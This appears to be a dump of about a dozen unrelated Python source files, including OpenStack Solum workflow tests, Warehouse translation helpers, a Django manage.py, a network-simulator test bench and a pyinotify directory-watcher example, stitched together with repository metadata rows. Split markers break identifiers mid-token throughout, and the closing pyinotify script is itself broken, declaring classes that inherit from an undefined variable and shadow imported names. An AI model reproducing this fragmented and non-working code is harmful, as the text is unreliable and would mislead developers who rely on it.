group=auth.OPT_GROUP_NAME)
self.CONF.config(keystone_version='3')
def test_workflow_get(self, mock_registry):
mock_registry.return_value.Workflow.get_by_uuid.return_value = {
'app_id': '1234'
}
handler = workflow_handler.WorkflowHandler(self.ctx)
res = handler.get('test_id')
self.assertIsNotNone(res)
get_by_uuid = mock_registry.Workflow.get_by_uuid
get_by_uuid.assert_called_once_with(self.ctx, 'test_id')
def test_workflow_get_all(self, mock_reg):
mock_reg.WorkflowList.get_all.return_value = {}
handler = workflow_handler.WorkflowHandler(self.ctx)
res = handler.get_all(app_id='123')
self.assertIsNotNone(res)
mock_reg.WorkflowList.get_all.assert_called_once_with(self.ctx,
app_id='123')
def test_delete(self, mock_registry):
db_obj = fakes.FakeWorkflow()
mock_registry.Workflow.get_by_uuid.return_value = db_obj
handler = workflow_handler.WorkflowHandler(self.ctx)
handler.delete('test_id')
mock_registry.Workflow.get_by_uuid.assert_called_once_with(self.ctx,
'test_id')
@mock.patch('solum.worker.api.API.build_app')
@mock.patch('solum.objects.sqlalchemy.workflow.Workflow.insert')
def test_create(self, mock_wf_insert, mock_pa, mock_registry):
app_obj = fakes.FakeApp()
app_id = app_obj.id
test_cmd = app_obj.workflow_config['test_cmd']
run_cmd = app_obj.workflow_config['run_cmd']
mock_registry.App.get_by_id.return_value = app_obj
workflow_data = {"actions": ["unittest", "build", "deploy"],
"app_id": app_id,
"source": app_obj.source,
"config": app_obj.workflow_config,
"actions": app_obj.trigger_actions}
fp = fakes.FakePlan()
mock_registry.Plan.return_value = fp
fa = fakes.FakeAssembly()
fa.plan_uuid = fp.uuid
mock_registry.Assembly.return_value = fa
wf_obj = fakes.FakeWorkflow()
wf_obj.app_id = app_obj.id
wf_obj.assembly = fa.id
mock_registry.Workflow.return_value = wf_obj
fi = fakes.FakeImage()
mock_registry.Image.return_value = fi
handler = workflow_handler.WorkflowHandler(self.ctx)
res = handler.create(workflow_data, commit_sha='', status_url='',
du_id='')
self.assertEqual(wf_obj, res)
git_info = {
'source_url': app_obj.source['repository'],
'commit_sha': app_obj.source['revision'],
'repo_token': '',
'status_url': None,
}
mock_pa.assert_called_once_with(
verb='launch_workflow', workflow=['unittest', 'build', 'deploy'],
build_id=fa.id, name=fi.name, assembly_id=fa.id,
git_info=git_info, test_cmd=test_cmd, ports=app_obj.ports,
base_image_id=fi.base_image_id,
source_format=fi.source_format,
image_format=fi.image_format, run_cmd=run_cmd, du_id='')
|
google/fedjax
|
fedjax/fedjax_test.py
|
Python
|
apache-2.0
| 1,219 | 0.003281 |
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
#
|
you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses
|
/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for fedjax."""
import unittest
import fedjax
class FedjaxTest(unittest.TestCase):
"""Test fedjax can be imported correctly."""
def test_import(self):
self.assertTrue(hasattr(fedjax, 'FederatedAlgorithm'))
self.assertTrue(hasattr(fedjax.aggregators, 'Aggregator'))
self.assertTrue(hasattr(fedjax.algorithms, 'fed_avg'))
self.assertTrue(hasattr(fedjax.datasets, 'emnist'))
self.assertTrue(hasattr(fedjax.models, 'emnist'))
self.assertTrue(hasattr(fedjax.training, 'save_checkpoint'))
def test_no_core(self):
self.assertFalse(hasattr(fedjax, 'core'))
if __name__ == '__main__':
unittest.main()
|
chopmann/warehouse
|
warehouse/i18n/translations.py
|
Python
|
apache-2.0
| 2,912 | 0 |
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections.abc
import functools
from jinja2 import contextfunction
from pyramid.threadlocal import get_current_request
class TranslationString:
def __init__(self, message_id, plural=None, n=None, mapping=None):
if mapping is None:
mapping = {}
self.message_id = message_id
self.plural = plural
self.n = n
self.mapping = mapping
if bool(self.plural) != bool(self.n):
raise ValueError("Must specify plural and n together.")
def __repr__(self):
ex
|
tra = ""
if self.plural is not None:
extra = " plural={!r} n={!r}".format(self.plural, self.n)
return "<TranslationString: message_id={!r}{}>".format(
self.messa
|
ge_id,
extra,
)
def __mod__(self, mapping):
if not isinstance(mapping, collections.abc.Mapping):
raise TypeError("Only mappings are supported.")
vals = self.mapping.copy()
vals.update(mapping)
return TranslationString(
self.message_id, self.plural, self.n, mapping=vals,
)
def translate(self, translation):
if self.plural is not None:
result = translation.ngettext(self.message_id, self.plural, self.n)
else:
result = translation.gettext(self.message_id)
return result % self.mapping
class JinjaRequestTranslation:
def __init__(self, domain):
self.domain = domain
@contextfunction
def gettext(self, ctx, *args, **kwargs):
request = ctx.get("request") or get_current_request()
return request.translation.gettext(*args, **kwargs)
@contextfunction
def ngettext(self, ctx, *args, **kwargs):
request = ctx.get("request") or get_current_request()
return request.translation.ngettext(*args, **kwargs)
@contextfunction
def translate_value(ctx, value):
if isinstance(value, TranslationString):
return value.translate(ctx["request"].translation)
return value
def gettext(message_id, **kwargs):
return TranslationString(message_id, mapping=kwargs)
def ngettext(message_id, plural, n=None, **kwargs):
if n is None:
return functools.partial(
TranslationString, message_id, plural, mapping=kwargs
)
return TranslationString(message_id, plural, n, mapping=kwargs)
|
Serchcode/cvirtual
|
manage.py
|
Python
|
gpl-3.0
| 806 | 0 |
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "cvirtual.settings")
try:
|
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
|
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
|
Alt90/Student_progress_bar
|
achievement/migrations/0001_initial.py
|
Python
|
mit
| 819 | 0.003745 |
# -*- coding: utf-8 -*-
# Generat
|
ed by Djan
|
go 1.10.6 on 2017-03-15 16:12
from __future__ import unicode_literals
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Student',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=2000, verbose_name='Имя студента')),
('rating', models.IntegerField(default=0, validators=[django.core.validators.MaxValueValidator(100), django.core.validators.MinValueValidator(0)], verbose_name='Рейтинг')),
],
),
]
|
dfleury/fairu
|
setup.py
|
Python
|
gpl-3.0
| 2,511 | 0.018319 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
from setuptools import setup
from fairu import __version__
def packages():
packages = []
for root, dirnames, filenames in os.walk('fairu'):
if '__init__.py' in filenames:
packages.append(".".join(os.path.split(root)).strip("."))
return packages
def description():
return open('README.md', 'r').read()
def requirements():
lines = open('REQUIREMENTS', 'r').readlines()
requirements = []
for line in lines:
requirements.append(line.replace('\n', ''))
return requirements
def entry_points():
ENTRY_POINTS = {}
try:
from setuptools import Command
except ImportError:
sys.stderr.write("setuptools.Command could not be
|
imported: setuptools "
"extensions not available")
else:
command_hook = "distutils.commands"
ENTRY_POINTS[command_hook] = []
from commands import coverage_analysis
if coverage_analysis.COVERAGE_ANALYSIS_AVAILABLE:
ENTRY_POINTS[command_hook].append("test = commands.coverage_ana"
|
"lysis:CoverageAnalysis")
return ENTRY_POINTS
def get_setup_config():
from ConfigParser import ConfigParser
config = ConfigParser()
config.read('setup.cfg')
def get_setup_config():
return config
return config
if __name__ == '__main__':
setup(name = 'fairu',
version = __version__,
description = "Fairu is a python library to handle files easily "
"using a chain pattern like the jQuery framework.",
author = 'Diego Fleury',
author_email = 'dfleury@gmail.com',
license = 'GPL',
keywords = "files batch process handling",
url = 'http://github.com/dfleury/fairu',
packages = packages(),
long_description = description(),
entry_points = entry_points(),
classifiers = ["Development Status :: 2 - Pre-Alpha",
"Intended Audience :: Developers"
"License :: OSI Approved :: GNU General Public "
"License (GPL)"
"Programming Language :: Python :: 2",
"Topic :: Software Development :: Libraries :: "
"Python Modules"],
install_requires = requirements()
)
|
ap--/python-seabreeze
|
src/seabreeze/pyseabreeze/features/databuffer.py
|
Python
|
mit
| 1,040 | 0 |
from seabreeze.pyseabreeze.features._base import SeaBreezeFe
|
ature
# Definition
# ==========
#
# TODO: This feature needs to be implemented for
|
pyseabreeze
#
class SeaBreezeDataBufferFeature(SeaBreezeFeature):
identifier = "data_buffer"
def clear(self) -> None:
raise NotImplementedError("implement in derived class")
def remove_oldest_spectra(self, number_of_spectra: int) -> None:
raise NotImplementedError("implement in derived class")
def get_number_of_elements(self) -> int:
raise NotImplementedError("implement in derived class")
def get_buffer_capacity(self) -> int:
raise NotImplementedError("implement in derived class")
def set_buffer_capacity(self, capacity: int) -> None:
raise NotImplementedError("implement in derived class")
def get_buffer_capacity_maximum(self) -> int:
raise NotImplementedError("implement in derived class")
def get_buffer_capacity_minimum(self) -> int:
raise NotImplementedError("implement in derived class")
|
sssundar/NetworkSimulator
|
Code/Python/unit_test_benches.py
|
Python
|
gpl-2.0
| 12,927 | 0.044403 |
# Working Unit Test Benches for Network Simulator
# Last Revised: 14 November 2015 by Sushant Sundaresh & Sith Domrongkitchaiporn
'''
IMPORTANT: Please turn off logging (MEASUREMENT_ENABLE = False) in constants.py
before running these testbenches.
'''
# Unit Testing Framework
import unittest
# Test Modules
import reporter, node, host, link, router
import flow, event_simulator, event, events
import link, link_buffer, packet
import constants
from static_flow_test_node import *
import visualize
class testMeasurementAnalysis (unittest.TestCase):
'''
Tests visualize.py time-averaging function
'''
def test_time_averaging (self):
self.assertTrue(visualize.test_windowed_time_average())
class TestStaticDataSinkFlow (unittest.TestCase):
'''
### Might break for dynamic TCP ###
if this is implemented on receiver side as well
Create Flow Data Sink
Create Static_Data_Sink_Test_Node
Tell Flow its number or expected packets
Create Event Simulator
For now:
Ask flow to receive a packet, check that Ack has same pack
|
et ID
Ask flow to receive the same packet again, should get same result.
'''
sim = "" # event simulator
f = "" # flow, data source, static
n = "" # test node
def setUp (self):
self.f = flow.Data_Sink("f1sink","h2","h1",\
3*constants.DATA_PACKET_BITWIDTH, 1.0)
self.n = Static_Data_Sink_Test_Node ("h2","f1sink")
self.sim = event_simulator.Event_Simulator({"f1sink":self.f,"h2":self.n})
self.f.set_flow_size(2)
def test_basic_ack (self):
|
packets = [ packet.Packet("f1source","h1","h2","",0,0), \
packet.Packet("f1source","h1","h2","",1,0)]
self.n.receive(packets[0])
self.assertEqual(self.n.head_of_tx_buff(),0)
self.n.receive(packets[1])
self.assertEqual(self.n.head_of_tx_buff(),1)
# Two packets received, two packets acknowledged
with self.assertRaises(ValueError):
self.n.head_of_tx_buff()
# Repeated packets just get repeated acks
self.n.receive(packets[1])
self.assertEqual(self.n.head_of_tx_buff(),1)
class TestStaticDataSourceFlow (unittest.TestCase):
'''
### Will break for dynamic TCP ###
Assumes Flow (Data Source) Window Size
hard-coded to 2
Create Flow Data Source
Create Static_Data_Source_Test_Node
Create Event Simulator
Start Flow -> pokes tcp -> sends two packets to Node
Check that these were sent to Node
Fake Acks through Node to Flow
Check that this updates Node Tx_Buffer (more sends from Flow)
Check what Timeout Does
'''
sim = "" # event simulator
f = "" # flow, data source, static
n = "" # test node
def setUp (self):
self.f = flow.Data_Source("f1","h1","h2",\
3*constants.DATA_PACKET_BITWIDTH, 1.0)
self.n = Static_Data_Source_Test_Node ("h1","f1")
self.sim = event_simulator.Event_Simulator({"f1":self.f,"h1":self.n})
def test_static_flow_source (self):
# The first static flow source implementation
# just has packets/acks have the same id.
# There is no chance of 'duplicate acks' to indicate loss
self.f.start() # do this manually so don't have to run simulator
self.assertEqual(self.n.head_of_tx_buff(),0)
packet1 = self.n.tx_buff[0]
self.assertEqual(self.n.head_of_tx_buff(),1)
with self.assertRaises(ValueError):
self.n.head_of_tx_buff()
self.n.receive(packet.Packet("","h2","h1",\
constants.DATA_PACKET_ACKNOWLEDGEMENT_TYPE,\
0,constants.DATA_ACK_BITWIDTH))
self.assertEqual(self.n.head_of_tx_buff(),2)
with self.assertRaises(ValueError):
self.n.head_of_tx_buff()
self.f.time_out(packet1)
# check that next packet has id 1
self.assertEqual(self.n.head_of_tx_buff(),1)
class TestLinkTransmissionEvents(unittest.TestCase):
sim = "" # simulator
link = "" # link
lNode = "" # left node
rNode = "" # right node
lPs = [] # left packets
rPs = [] # right packets
# Create Event Simulator
# Create Link & Nodes (not Hosts, so don't need working Flow) on either side
# Create three packets from either side, to the other, and send them.
def setUp (self):
self.lNode = node.Node("h1")
self.rNode = node.Node("h2")
# don't need flow, as no packet timeouts created to callback to flow
# and node receive is a dummy function
for i in 1, 2, 3:
self.lPs.append(packet.Packet("","h1","h2","data",i,1000)) # 1000kbit
self.rPs.append(packet.Packet("","h2","h1","data",i,1000))
self.link = link.Link("l1", "h1", "h2", 1000.0, 10.0, 3000.0)
# 1000kbit/ms, 10 ms prop delay, 3000kbit buffers
self.sim = event_simulator.Event_Simulator({"l1":self.link, \
"h1":self.lNode, \
"h2":self.rNode})
# Order the packet sends 2L-2R-L-R
# Run Sim Forward
# Watch for transmission events in EventSimulator, with proper timestamp
# Watch for propagation events in EventSimulator, with proper timestamp
# Make sure these are sequential, with only one Tx event at a time in
# the queue, and two propagations in each direction chained, and one isolated.
# Note this tests most events we're trying to deal with.
def test_packet_callbacks_and_timing (self):
self.link.send(self.rPs.pop(0),"h2") # right going packets
# are favored in time tie breaks
self.link.send(self.rPs.pop(0),"h2")
self.link.send(self.rPs.pop(0),"h2")
self.link.send(self.lPs.pop(0),"h1")
# all have timestamp 0.0
# so link should switch directions
# between each packet
# Confirm Handle_Packet_Transmission events show up in EventSim
# with proper timestamps
self.assertTrue(self.sim.get_current_time() == 0)
self.sim.run_next_event()
self.assertTrue(self.sim.get_current_time() == 1)
# right packet1 load
# into channel at
# 1ms going h2->h1
self.assertTrue(self.link.transmission_direction == constants.RTL)
self.sim.run_next_event()
self.assertTrue(self.sim.get_current_time() == 11)
# propagation done
# direction switched
# next packet loaded
# LTR
self.assertTrue(self.link.transmission_direction == constants.LTR)
# next event is a load (12)
# then a propagation (22)
# then
# the next event should be
# both remaining h2 packets
# loaded, as left buffer
# is empty
self.sim.run_next_event()
self.assertTrue(self.sim.get_current_time() == 12)
self.sim.run_next_event()
self.assertTrue(self.sim.get_current_time() == 22)
self.assertTrue(self.link.transmission_direction == constants.RTL)
self.sim.run_next_event()
self.sim.run_next_event() # two loads
self.assertTrue(self.sim.get_current_time() == 24)
self.assertTrue(self.link.transmission_direction == constants.RTL)
self.sim.run_next_event() # two propagations
self.sim.run_next_event()
self.assertTrue(self.link.transmission_direction == constants.RTL)
self.assertTrue(self.sim.get_current_time() == 34)
class TestLinkBuffer(unittest.TestCase):
# test variables
l = "" # a link buffer
p = "" # a packet exactly half the size of the buffer
s = "" # event simulator
def setUp (self):
c = 100 # buffer capacity in bits
self.s = event_simulator.Event_Simulator({})
self.l = link_buffer.LinkBuffer(c)
self.l.set_event_simulator(self.s)
self.p = packet.Packet("","","","","",c/2)
def test_enqueue_dequeue (self):
self.assertTrue(self.l.can_enqueue(self.p))
self.l.enqueue(self.p)
self.assertTrue(self.l.can_enqueue(self.p))
self.l.enqueue(self.p)
self.assertFalse(self.l.can_enqueue(self.p))
self.l.enqueue(self.p) # dropped
self.l.enqueue(self.p) # dropped
self.assertTrue(self.l.can_dequeue())
self.assertTrue( isinstance(self.l.dequeue(),packet.Packet) )
self.assertTrue(self.l.can_dequeue())
self.assertTrue( isinstance(self.l.dequeue(),packet.Packet) )
self.assertFalse(self.l.can_dequeue())
with self.assertRaises(ValueError):
self.l.dequeue()
class TestReporter(unittest.TestCase):
# Set ID of reporter
def test_get_id(self):
ID = "H1"
r = reporter.Reporter(ID)
r.log("Hello World!")
self.assertEqual(r.get_id(), ID)
class Tes
|
YannickDieter/testbeam_analysis
|
testbeam_analysis/examples/eutelescope.py
|
Python
|
mit
| 14,587 | 0.001303 |
''' Example script to run a full analysis on telescope data. The original data
can be found in the example folder of the EUTelescope framework.
Data in https://github.com/eutelescope/eutelescope/tree/v1.0-tag/jobsub/examples/datura-150mm-DAF
The residuals are calculated with different cuts on prealigned and aligned data
for demonstration purpose:
- When only prealigning the DUTs and using all DUT hits and cutting on the chi2:
The residuals are very dependent if the prealignment is sufficient. Residuals
are usually rather high (several 10 um)
- When aligning the DUTs and only interpolating the tracks from 2 DUTs:
The residual for the planes 2 - 4 (DUT 1 - DUT 3) are about 6.5 um in x/y and
comparable to the residuals from the EuTelescope software (6 um).
- When aligning the DUTs and using all DUT hits and cutting on the chi2:
The residuals and selected number of tracks are highly dependent on the
chi2 cut and are at least 6 um and usually < 10 um depending on the
plane position. This is an effect of multiple scattering. The outer most plans
have a rather high residual (~ 18 um)
- When using a Kalman Filter for track builing instead of an interpolation
which takes no correlations between the measurements into account, the
residuals can be improved by ~ 30 percent for the inner planes.
Setup
-----
The telescope consists of 6 planes with 15 cm clearance between the planes.
The data was taken at Desy with ~ 5 GeV/c (Run number 36).
The Mimosa26 has an active area of 21.2mm x 10.6mm and the pixel matrix
consists of 1152 columns and 576 rows (18.4um x 18.4um pixel size).
The total size of the chip is 21.5mm x 13.7mm x 0.036mm
(radiation length 9.3660734)
The matrix is divided into 4 areas. For each area the threshold can be set up
individually. The quartes are from column 0-287, 288-575, 576-863 and 864-1151.
The Mimosa26 detects ionizing particle with a density of up to
10^6 hits / cm^2 / s. The hit rate for a beam telescope is ~5 hits / frame.
'''
import os
import inspect
import logging
from testbeam_analysis import (hit_analysis, dut_alignment, track_analysis,
result_analysis)
from testbeam_analysis.tools import analysis_utils
logging.basicConfig(
level=logging.INFO, format="%(asctime)s - %(name)s - [%(levelname)-8s]\
(%(threadName)-10s) %(message)s")
def run_analysis(data_files):
# Pixel dimesions and matrix size of the DUTs
pixel_size = [(18.4, 18.4)] * 6 # Column, row pixel pitch in um
n_pixels = [(1152, 576)] * 6 # Number of pixel on column, row
z_positions = [0., 150000, 300000, 450000, 600000, 750000] # z position in um
# Friendly names for plotting
dut_names = ("Tel_0", "Tel_1", "Tel_2", "Tel_3", "Tel_4", "Tel_5")
# Create output subfolder where all output data and plots are stored
output_folder = os.path.join(os.path.split(data_files[0])[0],
'output_eutel')
if not os.path.exists(output_folder):
os.makedirs(output_folder)
# The following shows a complete test beam analysis by calling the
# seperate function in correct order
# Generate noisy pixel mask for all DUTs
for i, data_file in enumerate(data_files):
hit_analysis.generate_pixel_mask(input_hits_file=data_file,
n_pixel=n_pixels[i],
pixel_mask_name='NoisyPixelMask',
pixel_size=pixel_size[i],
threshold=0.5,
dut_name=dut_names[i])
# Cluster hits from all DUTs
for i, data_file in enumerate(data_files):
hit_analysis.cluster_hits(input_hits_file=data_file,
input_noisy_pixel_mask_file=os.path.splitext(data_files[i])[0] + '_noisy_pixel_mask.h5',
min_hit_charge=0,
max_hit_charge=1,
column_cluster_distance=3,
row_cluster_distance=3,
frame_cluster_distance=1,
dut_name=dut_names[i])
|
# Generate filenames for cluster data
input_cluster_files = [os.path.splitext(data_file)[0] + '_clustered.h5'
for data_file in data_files]
# Correlate the row / col
|
umn of each DUT
dut_alignment.correlate_cluster(input_cluster_files=input_cluster_files,
output_correlation_file=os.path.join(
output_folder, 'Correlation.h5'),
n_pixels=n_pixels,
pixel_size=pixel_size,
dut_names=dut_names)
# Create prealignment relative to the first DUT from the correlation data
input_correlation_file = os.path.join(output_folder, 'Correlation.h5')
dut_alignment.prealignment(input_correlation_file=input_correlation_file,
output_alignment_file=os.path.join(
output_folder, 'Alignment.h5'),
z_positions=z_positions,
pixel_size=pixel_size,
dut_names=dut_names,
# This data has several tracks per event and
# noisy pixel, thus fit existing background
fit_background=True,
# Tries to find cuts automatically;
# deactivate to do this manualy
non_interactive=True)
# Merge the cluster tables to one merged table aligned at the event number
dut_alignment.merge_cluster_data(input_cluster_files=input_cluster_files,
output_merged_file=os.path.join(
output_folder, 'Merged.h5'),
n_pixels=n_pixels,
pixel_size=pixel_size)
# Apply the prealignment to the merged cluster table to create tracklets
dut_alignment.apply_alignment(
input_hit_file=os.path.join(output_folder, 'Merged.h5'),
input_alignment_file=os.path.join(output_folder, 'Alignment.h5'),
output_hit_file=os.path.join(output_folder,
'Tracklets_prealigned.h5'),
force_prealignment=True)
# Find tracks from the prealigned tracklets and stores them with quality
# indicator into track candidates table
track_analysis.find_tracks(
input_tracklets_file=os.path.join(output_folder,
'Tracklets_prealigned.h5'),
input_alignment_file=os.path.join(output_folder, 'Alignment.h5'),
output_track_candidates_file=os.path.join(
output_folder, 'TrackCandidates_prealignment.h5')
)
# The following two steps are for demonstration only.
# They show track fitting and residual calculation on
# prealigned hits. Usually you are not interested in this and will use
# the aligned hits directly.
# Step 1.: Fit the track candidates and create new track table (using the
# prealignment!)
track_analysis.fit_tracks(
input_track_candidates_file=os.path.join(
output_folder, 'TrackCandidates_prealignment.h5'),
input_alignment_file=os.path.join(output_folder, 'Alignment.h5'),
output_tracks_file=os.path.join(output_folder, 'Tracks_prealigned.h5'),
# To get unconstrained residuals do not use DUT
# hit for track fit
exclude_dut_hit=True,
# This is just for demonstration purpose, usually
# uses fully aligned hits
force_prealignment=True,
selection_track_quality=0) # We will cut on chi2
# Step 2.: Calculate the residuals to check the alignment (using the
#
|
Micronaet/micronaet-migration
|
sale_exchange/__init__.py
|
Python
|
agpl-3.0
| 1,139 | 0.002634 |
# -*- coding: utf-8 -*-
###############################################################################
#
# ODOO (ex OpenERP)
# Open Source Management Solution
# Copyright (C) 2001-2015 Micronaet S.r.l. (<http://www.micronaet.it>)
# Developer: Nicola Riolini @thebrush (<https://it.linkedin.com/in/thebrush>)
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARR
|
ANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero General Public Lice
|
nse for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
from . import exchange
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
aewallin/openvoronoi
|
python_examples/spike_1.py
|
Python
|
lgpl-2.1
| 4,238 | 0.001416 |
import openvoronoi as ovd
import ovdvtk
import time
import vtk
import datetime
import math
import random
import os
import sys
import pickle
import gzip
if __name__ == "__main__":
# w=2500
# h=1500
# w=1920
# h=1080
w = 1024
h = 1024
myscreen = ovdvtk.VTKScreen(width=w, height=h)
ovdvtk.drawOCLtext(myscreen, rev_text=ovd.version())
w2if = vtk.vtkWindowToImageFilter()
w2if.SetInput(myscreen.renWin)
lwr = vtk.vtkPNGWriter()
lwr.SetInputConnection(w2if.GetOutputPort())
# w2if.Modified()
# lwr.SetFileName("tux1.png")
scale = 1
myscreen.render()
random.seed(42)
far = 1
camPos = far
zmult = 3
# camPos/float(1000)
myscreen.camera.SetPosition(0, -camPos / float(1000), zmult * camPos)
myscreen.camera.SetClippingRange(-(zmult + 1) * camPos, (zmult + 1) * camPos)
myscreen.camera.SetFocalPoint(0.0, 0, 0)
vd = ovd.VoronoiDiagram(far, 120)
print ovd.version()
# for vtk visualization
vod = ovdvtk.VD(myscreen, vd, float(scale), textscale=0.01, vertexradius=0.003)
vod.drawFarCircle()
vod.textScale = 0.02
vod.vertexRadius = 0.0031
vod.drawVertices = 0
vod.drawVertexIndex = 1
vod.drawGenerators = 0
vod.offsetEdges = 1
vd.setEdgeOffset(0.05)
linesegs = 1 # switch to turn on/off line-segments
segs = []
# ovd.Point(1,1)
eps = 0.9
p1 = ovd.Point(-0.1, -0.2)
p2 = ovd.Point(0.2, 0.1)
p3 = ovd.Point(0.4, 0.2)
p4 = ovd.Point(0.6, 0.6)
p5 = ovd.Point(-0.6, 0.3)
pts = [p1, p2, p3, p4, p5]
# t_after = time.time()
# print ".done in {0:.3f} s.".format( t_after-t_before )
times = []
id_list = []
m = 0
t_before = time.time()
for p in pts:
id_list.append(vd.addVertexSite(p))
# print m," added vertex", seg_id[0]
m = m + 1
t_after = time.time()
times.append(t_after - t_before)
# exit()
|
# print " ",2*Nmax," point-sites sites took {0:.3f}".format(times[0])," seconds, {0:.2f}".format( 1e6*float( times[0] )/(float(2*Nmax)*float(math.log10(2*Nmax))) ) ,"us/n*log(n)"
print "all point sites inserted. ",
vd.check()
# nsegs = Nmax
# nsegs = 5 #Nmax
# n=1
t_before = time.time()
# vd.debug_on()
vd.addLineSite(id_list[0], id_list[1])
# vd.check()
# vd.debug_on()
vd.addLineSite(id_
|
list[1], id_list[2])
# vd.check()
# vd.addLineSite( id_list[2], id_list[3])
# vd.check()
# vd.debug_on()
# vd.addLineSite( id_list[3], id_list[4])
# vd.check()
vd.debug_on()
vd.addLineSite(id_list[4], id_list[1], 10) # FIXME spikes are not allowed, so this does not complete OK
# vd.check()
t_after = time.time()
line_time = t_after - t_before
if line_time < 1e-3:
line_time = 1
times.append(line_time)
# s = id_list[nsegs]
# vd.debug_on()
# vd.addLineSite( s[0], s[1], 10)
# seg = id_list[nsegs]
# vd.addLineSite(seg[0],seg[1],10)
# 1 identify start/endvert
# 2 add line-segment edges/sites to graph
# 3 identify seed-vertex
# 4 create delete-tree
# 5 process/create null faces at start/end
# 6 create LineSite and add pseudo-edges
# 7 create NEW vertices on IN-OUT edges
# 8 add positive/start separator edge
# 9 add negative/start separator edge
# 10 add positive/end separator edge
# 5 create new vertices
# 6 add startpoint pos separator
# 7 add startpoint neg separator
# 8 add end-point pos separator
# 9 add end-point neg separator
# 10 add new edges
# 11 delete delete-tree edges
# 12 reset status
vod.setVDText2(times)
err = vd.getStat()
# print err
print "got errorstats for ", len(err), " points"
if len(err) > 1:
minerr = min(err)
maxerr = max(err)
print "min error= ", minerr
print "max error= ", maxerr
print "num vertices: ", vd.numVertices()
print "num SPLIT vertices: ", vd.numSplitVertices()
calctime = t_after - t_before
vod.setAll()
print "PYTHON All DONE."
myscreen.render()
# w2if.Modified()
# lwr.SetFileName("{0}.png".format(Nmax))
# lwr.Write()
myscreen.iren.Start()
|
relic7/prodimages
|
python/DirWatchManager.py
|
Python
|
mit
| 15,047 | 0.009238 |
#!/usr/bin/env python
# #To familiarize yourself with pyinotify, run a first example like this:
#
# # $ cd pyinotify-x-x-x && python setup.py build
# # $ python src/pyinotify/pyinotify.py -v my-dir-to-watch
#
# # Let's start a more detailed example. Say, we want to monitor the temp directory '/tmp' and all its subdirectories for every new file's creation or deletion. For sake of simplicity, we only print messages for every notification on standart output.
# #
# # Now you have the choice to either receive and process the notifications in the thread who instantiate the monitoring, the main benefit is that it doesn't need to instantiate a new thread, the drawback is to block your program in this task. Or, you don't want to block your main thread, so you can handle the notifications in a new separate thread. Choose which one is the most adapted to your needs and is consistent with your constraints and design choices. Next, we will detail the two approaches:
# # Notifier ThreadedNotifier
# #
# # #First the import statements: the watch manager stores the watches and provide operations on watches. EventsCodes bring a set of codes, each code is associated to an event. ProcessEvent is the processing class.
import os
from pyinotify import WatchManager, Notifier, ThreadedNotifier, EventsCodes, ProcessEvent
wm = WatchManager()
#The following class inherit from ProcessEvent, handle notifications and process defined actions with individual processing methods whose the name is written with the specific syntax: process_EVENT_NAME where EVENT_NAME is the name of the handled event to process.
mask = EventsCodes.IN_DELETE | EventsCodes.IN_CREATE # watched events
class PTmp(ProcessEvent):
def process_IN_CREATE(self, event):
print "Create: %s" % os.path.join(event.path, event.name)
def process_IN_DELETE(self, event):
print "Remove: %s" % os.path.join(event.path, event.name)
# This statement instantiate our notifier class and realizes initializations with in particular the inotify's instantiation. The second parameter is a callable object the one which will be used to process notified events this way: PTmp()(event) where event is the notified event.
# The next statement add a watch on the first parameter and recursively on all its subdirectories, note that symlinks are not followed. The recursion is due to the optional parameter named 'rec' set to True. By default, the monitoring is limited to the level of the given directory. It returns a dict where keys are paths and values are corresponding watch descriptors (wd) and is assigned to wdd. An unique wd is attributed to every new watch. It is useful (and often necessary) to keep those wds for further updating or removing one of those watches, see the dedicated section. Obviously, if the monitored element had been a file, the rec parameter would have been ignored whatever its value.
# Let's start reading the events and processing them. Note that during the loop we can freely add, update or remove any watches, we can also do anything we want, even stuff unrelated to pyinotify. We call the stop() method when we want stop monitoring.
class Notifier(watchdir):
notifier = Notifier(wm, PTmp())
watchdir = os.path.abspath(watchdir)
wdd = wm.add_watch(watchdir, mask, rec=True)
while True: # loop forever
try: # process the queue of events as explained above
notifier.process_events()
if notifier.check_events():
notifier.read_events()
# read notified events and enqeue them
# you can do some tasks here...
except KeyboardInterrupt: # destroy the inotify's instance on this interrupt (stop monitoring)
notifier.stop()
break
class ThreadedNotifier(watchdir):
#The second line starts the new thread, doing actually nothing as no directory or file is being monitored.
notifier = ThreadedNotifier(wm, PTmp())
notifier.start()
watchdir = os.path.abspath(watchdir)
wdd = wm.add_watch(watchdir, mask, rec=True)
####
####At any moment we can for example remove the watch on '/tmp' like This:
if wdd[watchdir] > 0: # test if the wd is valid, this test i
|
s not mandatory
wm.rm_watch(wdd[watchdir])
